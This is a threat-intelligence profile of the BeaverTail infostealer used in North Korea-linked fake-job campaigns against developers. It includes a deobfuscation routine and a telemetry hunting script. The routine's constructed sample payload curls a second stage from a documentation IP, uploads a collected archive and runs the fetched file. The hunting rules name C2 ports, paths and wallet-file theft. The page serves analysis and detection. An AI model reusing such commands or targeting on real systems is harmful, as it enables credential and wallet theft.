BeaverTail
BeaverTail is a JavaScript-based malware family, with reported native C++/Qt variants, used primarily as an infostealer and downloader in North Korea-linked campaigns that target software developers. Public reporting consistently links it to DPRK activity clusters tracked under names including DeceptiveDevelopment, Contagious Interview, PurpleBravo, Void Dokkaebi/Famous Chollima, DEV#POPPER, and WageMole. It is commonly paired with later-stage malware such as InvisibleFerret and OtterCookie, and in some reporting with Tropidoor or TsunamiKit.
Initial access is primarily via social engineering. Observed lures include fake job interviews, coding challenges, malicious JavaScript projects or trojanized repositories on GitHub, GitLab, Bitbucket, and npm-style ecosystems, as well as trojanized conferencing or chat software such as fake MiroTalk/MicroTalk/FreeConference-style applications. Victims are predominantly software developers, especially freelancers and individuals involved in cryptocurrency, Web3, blockchain, and decentralized finance, though broader software engineering and DevOps audiences are also mentioned. The malware has been observed on Windows, Linux, and macOS, including macOS activity in 2025 delivered through job-interview and programming-task lures distributed via gig work sites.
Reported capabilities include theft of browser credentials and saved logins, browser extension data, cryptocurrency wallet data, Firefox login databases, macOS Keychain data, Linux keyring data, and Solana keys from .config/solana/id.json in the user's home directory. Reported targeted wallet extensions include MetaMask, BNB Chain Wallet, Coinbase Wallet, TronLink, Phantom, Ronin Wallet, Coin98 Wallet, Crypto.com Wallet, Kaia Wallet, Rabby Wallet, Argent X, and Exodus Web3 Wallet. Newer reporting states that updated variants harvest credentials, private master keys, and seed phrases, and may install trojanized browser extensions that impersonate MetaMask, Coinbase Wallet, and Phantom.
Operationally, BeaverTail stages collected data in the system temporary directory, exfiltrates it to command-and-control servers, and downloads second-stage payloads. In ESET reporting, BeaverTail commonly communicates over ports 1224 or 1244, uploads stolen data to a /uploads endpoint, downloads a Python environment archive named p2.zip, and retrieves the next stage from /client/<campaign_ID>, saving it as .npl in the user's home directory. Other reporting notes use of curl, filenames such as p.zi and p2.zip, and likely FTP exfiltration observed between BeaverTail C2 infrastructure and victims. One campaign delivered BeaverTail disguised as tailwind.config.js alongside a downloader named car.dll; another report describes a hidden JavaScript loader in malicious repositories that ultimately leads to a BeaverTail or OtterCookie infection.
Reporting also describes evolving tradecraft. Some BeaverTail variants obfuscate their payloads with shuffled Base64 fragments, junk-byte prepending, and XOR encryption. A native C++/Qt variant has been reported, and BeaverTail has been tied to multi-stage delivery frameworks in which loaders retrieve payloads from blockchain transaction data or from public JSON-storage services used as dead drops in DPRK developer-targeting operations. A campaign marker, global['!']='9-0264-2', is explicitly tied to prior Famous Chollima operations and linked to BeaverTail payloads.
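The routine below, added here as a worked example and not code from any sample or vendor write-up, shows how an analyst reverses the three obfuscation layers named above in the order they would be unwound: strip the prepended junk, undo the repeating-key XOR (with a known key, or by recovering it from the fact that the plaintext must be Base64), put the shuffled fragments back in order, and Base64-decode. The layer order, the "|" separator, the four-byte key length, the fragment permutation, the junk length and the sample plaintext are all constructed assumptions so the code is runnable offline; for a real sample these parameters must be read out of the loader's own decode routine.

```python
"""Reverse the obfuscation layers the reporting attributes to some BeaverTail
variants: junk bytes prepended to the blob, XOR with a short repeating key, and
a Base64 payload stored as shuffled fragments.

Added example; not code from any sample or vendor.  Layer order, separator
byte, key length, junk length and fragment permutation are constructed
assumptions.  For a real sample, lift them from the loader's decode routine.
"""
import base64
import itertools
import random

SEP = b"|"  # assumed fragment separator; deliberately not a Base64 character
B64_CHARS = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=") | set(SEP)


def xor_bytes(data, key):
    """XOR data with a repeating key (its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_layered(plain, key, junk_len, n_frag, seed=7):
    """Constructed encoder for the assumed format, used only to build a sample.
    Returns (blob, order); order[i] is the original index of the fragment
    stored at position i."""
    b64 = base64.b64encode(plain)
    step = -(-len(b64) // n_frag)  # ceiling division
    frags = [b64[i:i + step] for i in range(0, len(b64), step)]
    rng = random.Random(seed)
    order = list(range(len(frags)))
    rng.shuffle(order)
    junk = bytes(rng.randrange(256) for _ in range(junk_len))
    return junk + xor_bytes(SEP.join(frags[i] for i in order), key), order


def candidate_keys(body, key_len, limit=256):
    """Known-charset attack on a short repeating XOR key: every decoded byte
    must be a Base64 character or the separator, which pins most key bytes.
    Returns up to `limit` candidate keys."""
    per_pos = []
    for pos in range(key_len):
        col = body[pos::key_len]
        per_pos.append([k for k in range(256) if all((c ^ k) in B64_CHARS for c in col)])
    return [bytes(k) for k in itertools.islice(itertools.product(*per_pos), limit)]


def unshuffle(body, order):
    """Split on the separator and restore the original fragment order."""
    frags = body.split(SEP)
    if len(frags) != len(order):
        raise ValueError("fragment count does not match the recorded order")
    restored = [b""] * len(frags)
    for stored_pos, orig_idx in enumerate(order):
        restored[orig_idx] = frags[stored_pos]
    return b"".join(restored)


def looks_like_script(data):
    """Plausibility check: a JavaScript stage should be printable ASCII."""
    return bool(data) and all(32 <= b < 127 or b in b"\r\n\t" for b in data)


def decode_layered(blob, junk_len, order, key=None, key_len=4):
    """Strip junk, undo XOR (given key or recovered), reorder, Base64-decode.
    Returns (plaintext, key_used); raises if no candidate key yields a script."""
    body = blob[junk_len:]
    keys = [key] if key is not None else candidate_keys(body, key_len)
    for k in keys:
        try:
            plain = base64.b64decode(unshuffle(xor_bytes(body, k), order), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        if looks_like_script(plain):
            return plain, k
    raise ValueError("no candidate key produced a plausible script")


# Constructed stand-in for a second-stage fetch; 203.0.113.10 is a
# documentation address and '42' a placeholder campaign ID.
SAMPLE_PLAINTEXT = (
    b"const cp=require('child_process');const c2='http://203.0.113.10:1224';"
    b"cp.exec(`curl -s ${c2}/client/42 -o ~/.npl`);"
    b"cp.exec(`curl -s -F f=@/tmp/collected.zip ${c2}/uploads`);cp.exec('python3 ~/.npl');"
)
SAMPLE_KEY = b"\x5a\x13\xc7\x2e"  # constructed
SAMPLE_BLOB, SAMPLE_ORDER = encode_layered(SAMPLE_PLAINTEXT, SAMPLE_KEY, junk_len=16, n_frag=6)

if __name__ == "__main__":
    plain, key = decode_layered(SAMPLE_BLOB, 16, SAMPLE_ORDER)
    print("recovered key:", key.hex())
    print(plain.decode())
```

The key-recovery step is the part worth reusing: whenever an XOR layer sits directly over Base64 text, the restricted output alphabet alone is usually enough to recover a short repeating key without knowing any plaintext, which is faster than tracing the key through minified loader code.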
High-confidence indicators and artifacts directly reported include the family names BeaverTail and BearVerTail (a spelling used in some reporting), disguise filenames such as tailwind.config.js, the p2.zip and .npl second-stage artifacts, communication over ports 1224/1244, uploads to /uploads, and the campaign marker global['!']='9-0264-2'. Note that tailwind.config.js is the standard configuration file of any Tailwind CSS project, so the filename alone is a hunt lead rather than an indicator; weight it by file content (the marker, long Base64 literals fed to eval) and by the network behaviour above. BeaverTail infections were also reported in Mexico in 2025.
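The script below, added here as an example and not taken from any vendor report or from the malware, turns the artifacts in the preceding paragraphs (ports 1224/1244, /uploads and /client/<campaign_ID>, p2.zip/p.zi/.npl, the Solana key file, extension storage reads, and the global['!'] marker) into a small hunt over host and network telemetry. The JSON-style event schema (fields type, proc, path, dst_port, uri, content), the sample events, the 32-letter placeholder extension ID, the 203.0.113.10 documentation address and the '/client/42' campaign ID are all constructed; the Chromium "Local Extension Settings/<id>/" LevelDB layout is real, and the browser process allow-list is an assumption to tune for your fleet.

```python
"""Hunt for BeaverTail-style host and network artifacts in telemetry.

Added example; not code from any vendor report or from the malware.  The
indicator values are the ones summarised on this page; the event schema and
all sample events are constructed.
"""
import json
import re
from pathlib import PurePosixPath

C2_PORTS = {1224, 1244}                                              # reported C2 ports
C2_URI_RE = re.compile(r"^/(?:uploads|client/[^/?]+)(?:[/?].*)?$")  # /uploads, /client/<campaign_ID>
STAGE_FILENAMES = {"p2.zip", "p.zi", ".npl"}                         # reported stage artifacts
SOLANA_KEY_RE = re.compile(r"/\.config/solana/id\.json$")
# Chromium keeps per-extension data as LevelDB .ldb/.log files under
# "Local Extension Settings/<32-char id>/"; extension IDs use letters a-p.
EXT_STORE_RE = re.compile(r"/Local Extension Settings/[a-p]{32}/[^/]+\.(?:ldb|log)$")
MARKER_RE = re.compile(r"""global\s*\[\s*['"]!['"]\s*\]\s*=\s*['"]9-0264-2['"]""")
LONG_B64_RE = re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")
# Assumption: only these process names are expected to open extension stores.
BROWSER_PROCS = {"chrome", "chrome.exe", "chromium", "msedge.exe", "brave"}


def hunt(events):
    """Return (rule, event) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        kind = ev.get("type")
        if kind == "net":
            if ev.get("dst_port") in C2_PORTS:
                hits.append(("c2_port", ev))
            if C2_URI_RE.match(ev.get("uri", "")):
                hits.append(("c2_uri", ev))
        elif kind == "file":
            path = ev.get("path", "")
            proc = ev.get("proc", "").lower()
            if PurePosixPath(path).name in STAGE_FILENAMES:
                hits.append(("stage_artifact", ev))
            if SOLANA_KEY_RE.search(path):
                hits.append(("solana_key_access", ev))
            if EXT_STORE_RE.search(path) and proc not in BROWSER_PROCS:
                hits.append(("ext_store_access_by_non_browser", ev))
        elif kind == "script":
            content = ev.get("content", "")
            if MARKER_RE.search(content):
                hits.append(("campaign_marker", ev))
            # tailwind.config.js is a normal file in Tailwind projects, so the
            # name alone is noise; also require an embedded long Base64 literal.
            if PurePosixPath(ev.get("path", "")).name == "tailwind.config.js" and LONG_B64_RE.search(content):
                hits.append(("disguised_tailwind_config", ev))
    return hits


def summarize(hits):
    """Count hits per rule for a quick triage table."""
    counts = {}
    for rule, _ in hits:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed sample telemetry.  203.0.113.10 / 198.51.100.5 are documentation
# addresses; the extension ID is a placeholder, not a real wallet extension.
EXT_STORE = ("/home/dev/.config/google-chrome/Default/Local Extension Settings/"
             "abcdefghijklmnopabcdefghijklmnop/000003.log")
SAMPLE_EVENTS = [
    {"type": "net", "proc": "node", "dst_ip": "203.0.113.10", "dst_port": 1224, "uri": "/uploads"},
    {"type": "net", "proc": "node", "dst_ip": "203.0.113.10", "dst_port": 1224, "uri": "/client/42"},
    {"type": "net", "proc": "curl", "dst_ip": "198.51.100.5", "dst_port": 443, "uri": "/api/v1/health"},
    {"type": "file", "proc": "node", "op": "create", "path": "/home/dev/.npl"},
    {"type": "file", "proc": "node", "op": "read", "path": "/home/dev/.config/solana/id.json"},
    {"type": "file", "proc": "node", "op": "read", "path": EXT_STORE},
    {"type": "file", "proc": "chrome", "op": "read", "path": EXT_STORE},
    {"type": "script", "path": "/home/dev/repo/tailwind.config.js",
     "content": "module.exports={};global['!']='9-0264-2';eval(Buffer.from('"
                + "QUFB" * 80 + "','base64').toString())"},
]

if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(f"{rule:34s} {json.dumps(ev)[:90]}")
    print(summarize(hunt(SAMPLE_EVENTS)))
```

Treat the port and /uploads rules as leads, not verdicts: both values are ordinary enough to appear in developer tooling, so page on them only when the same host also shows a stage artifact, a key-file read, or the marker.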
Groups observed using it
10 distinct threat actors attributed by public researchers.
This will eventually lead to either OtterCookie or BeaverTail malware. Running the entire repository ultimately leads to an infection.
Palo Alto Unit 42: DEV#POPPER, with malware families BeaverTail and InvisibleFerret.
Instructional videos have also been found with what looks like non-native English text, detailing how to set up a BeaverTail malware command-and-control server and how to crack cryptocurrency wallet passwords.
The campaign used the JavaScript infostealer BeaverTail, the cross-platform Python backdoor InvisibleFerret, and most recently OtterCookie, a new backdoor identified in December 2024.
Once run locally on the machine, the package referenced in the supposed project acts as a stealer (i.e., BeaverTail) to harvest browser credentials, cryptocurrency wallet data, macOS Keychain, keystrokes, clipboard content, and screenshots. The malware is designed to download additional payloads, including a cross-platform Python backdoor codenamed InvisibleFerret.
The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families, BeaverTail, OtterCookie, and InvisibleFerret, in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique)
Initial Access (6 techniques)
With the unique fingerprint, we identified 77 malicious GitHub repositories... Running the entire repository ultimately leads to an infection.
A malicious npm package (chai-as-init), disguised as a plugin for the popular test framework Chai.js, was distributed in three versions, v1.4.5 through v1.4.7.
MITRE ATT&CK T1195.002: Supply Chain Compromise: Compromise Software Supply Chain
The threat actor sends the target, under the pretext of a job interview, JSON Storage services it has previously exploited... Target audience: programmers, software developers, and DevOps and DevSecOps teams attending job-search interviews.
After 2–3 friendly exchanges, the recruiter sends "please review the codebase before our technical interview." Calendly link, often on a fresh subdomain.
Foreign IT professionals are contacted as part of a common social engineering tactic that involves enticing software developers with fake job interviews. In this scheme, developers apply for positions advertised on platforms like LinkedIn and other recruitment sites.
Execution (5 techniques)
This will eventually lead to either OtterCookie or BeaverTail malware. Running the entire repository ultimately leads to an infection.
InvisibleFerret is modular Python malware... Finally, the next stage is downloaded from the C&C server ... and executed using the downloaded Python environment.
In the first stage, the malware runs a JavaScript file named BearVerTail and payload deployment begins.
Stealth (3 techniques)
Inside the files there is a base64-encoded, malware-style payload... TsunamiKit carries a base64-encoded URL payload.
Credential Access (4 techniques)
If they are found, any .ldb and .log files from the extensions’ directories are collected and exfiltrated. Apart from these files, the malware also targets a file containing the Solana keys stored in the user’s home directory in .config/solana/id.json
The JavaScript-based malware is designed to scan for and exfiltrate sensitive data, with a particular focus on cryptocurrency wallets, browser extension data, and credentials.
Discovery (1 technique)
Collection (2 techniques)
Command and Control (6 techniques)
Instructional videos have also been found... detailing how to set up a Beavertail malware command-and-control server... Another cluster of Beavertail command-and-control (C&C) servers has been administered through VPN, proxies and RDP sessions from the same Russian IP ranges as well.
They continued the attack while appearing to be legitimate traffic by using domains regarded as safe JSON Storage services, such as "JsonSilo, JsonKeeper, Npoint"... In fact, the incident is resolved here by monitoring the HTTP traffic.
Zscaler... described a two-part infection chain in which the initial reconnaissance took place over HTTP traffic and FTP was used for data exfiltration... Shortly after the reconnaissance traffic, we observed likely exfiltration FTP traffic between the same IP addresses.
Exfiltration (1 technique)
IOCs tracked for this family
314 indicators attributed across vendor reports, sandbox runs, and researcher write-ups: IPs, domains, and DNS infrastructure; file hashes (MD5, SHA-1, SHA-256) from samples and reports; and other indicator types observed in public reporting.
Recent activity
157 sources tracked across advisories, community write-ups, and news.
Stealer malware identified as one of the leading observed infections in Mexico in 2025.
Malware associated with the Contagious Interview campaign and described here as used for information theft.
Malware payload family associated with Famous Chollima; in this campaign, the malicious code acts as a JavaScript/Node.js loader that retrieves encrypted payloads from blockchain transaction data.
A DPRK-linked malware family described here as a backdoor/infostealer variant delivered through the same blockchain-based loader architecture.